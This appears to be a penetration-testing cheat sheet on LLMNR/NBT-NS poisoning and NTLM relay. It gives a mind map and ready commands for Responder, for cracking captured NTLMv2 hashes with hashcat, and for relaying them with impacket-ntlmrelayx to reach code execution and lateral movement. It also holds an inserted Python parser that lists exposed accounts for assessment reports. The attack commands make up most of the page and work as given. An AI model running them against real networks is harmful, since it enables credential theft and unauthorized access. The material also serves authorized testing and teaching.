LLMNR/NBT-NS Attack Flow

Poisoning and relay attack methodology

LLMNR/NBT-NS Poisoning

Mind Map

graph TD
    A[Network Access] --> B[Start Responder]
    B --> C[Wait for Broadcast]
    C --> D[Capture NTLMv2]
    D --> E{Attack Path}
    E --> F[Crack Offline]
    E --> G[NTLM Relay]
    F --> H[hashcat -m 5600]
    H --> I[Plaintext Creds]
    G --> J[Check SMB Signing]
    J -->|Disabled| K[ntlmrelayx]
    K --> L[Code Execution]
    I --> M[Lateral Movement]
    L --> M

Quick Reference

Responder

sudo responder -I eth0 -rdwv # Start Responder on eth0

Captured Hashes

# Location
/usr/share/responder/logs/ # Log directory
# Format: NTLMv2
user::DOMAIN:challenge:response:... # Hash format
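
An added example (not from the original page or from the Responder project): a parser for the NTLMv2 line format above that validates each capture and summarizes which accounts were exposed during an authorized assessment, so the report can list them for password resets. The field widths follow the hashcat -m 5600 layout (16-hex server challenge, 32-hex NTProofStr, then the client blob); the function names and sample lines are constructed for illustration.

```python
import re
from collections import Counter

# NTLMv2 capture line as read by hashcat -m 5600:
#   user::DOMAIN:server_challenge:NTProofStr:blob
NTLMV2_RE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):"
    r"(?P<challenge>[0-9A-Fa-f]{16}):"   # 8-byte server challenge
    r"(?P<proof>[0-9A-Fa-f]{32}):"       # 16-byte HMAC-MD5 (NTProofStr)
    r"(?P<blob>(?:[0-9A-Fa-f]{2})+)$"    # client blob, whole bytes only
)

def parse_ntlmv2(line):
    """Return the fields of one capture line, or None if it is malformed."""
    m = NTLMV2_RE.match(line.strip())
    return m.groupdict() if m else None

def exposed_accounts(lines):
    """Count captures per account (names compared case-insensitively)."""
    counts, rejected = Counter(), []
    for line in lines:
        if not line.strip():
            continue
        rec = parse_ntlmv2(line)
        if rec is None:
            rejected.append(line.strip())  # truncated or non-NTLMv2 line
            continue
        counts[(rec["domain"].upper(), rec["user"].lower())] += 1
    return counts, rejected

def report(counts):
    """One row per account; machine accounts (trailing $) are marked."""
    rows = []
    for (domain, user), n in sorted(counts.items()):
        kind = "machine" if user.endswith("$") else "user"
        rows.append(f"{domain}\\{user}\t{kind}\tcaptures={n}")
    return rows

# Constructed sample lines (hex values are made up, not real captures).
SAMPLE = [
    "jsmith::CORP:1122334455667788:" + "ab" * 16 + ":" + "0101" + "00" * 30,
    "JSmith::corp:8877665544332211:" + "cd" * 16 + ":" + "0101" + "00" * 30,
    "WS01$::CORP:0011223344556677:" + "ef" * 16 + ":" + "0101" + "00" * 30,
    "truncated::CORP:1122334455667788:abcd",
]

if __name__ == "__main__":
    counts, rejected = exposed_accounts(SAMPLE)
    print("\n".join(report(counts)))
    print(f"rejected {len(rejected)} malformed line(s)")
```

Repeated captures of one account collapse into a single row, so the row count is the number of distinct accounts exposed rather than the number of broadcasts answered.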

Crack with Hashcat

hashcat -m 5600 hash.txt wordlist.txt # Crack NTLMv2 hashes

Relay Attack

# If SMB signing disabled
impacket-ntlmrelayx -tf targets.txt -smb2support # Relay NTLM auth to targets
# Targets without signing
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt # Find relay targets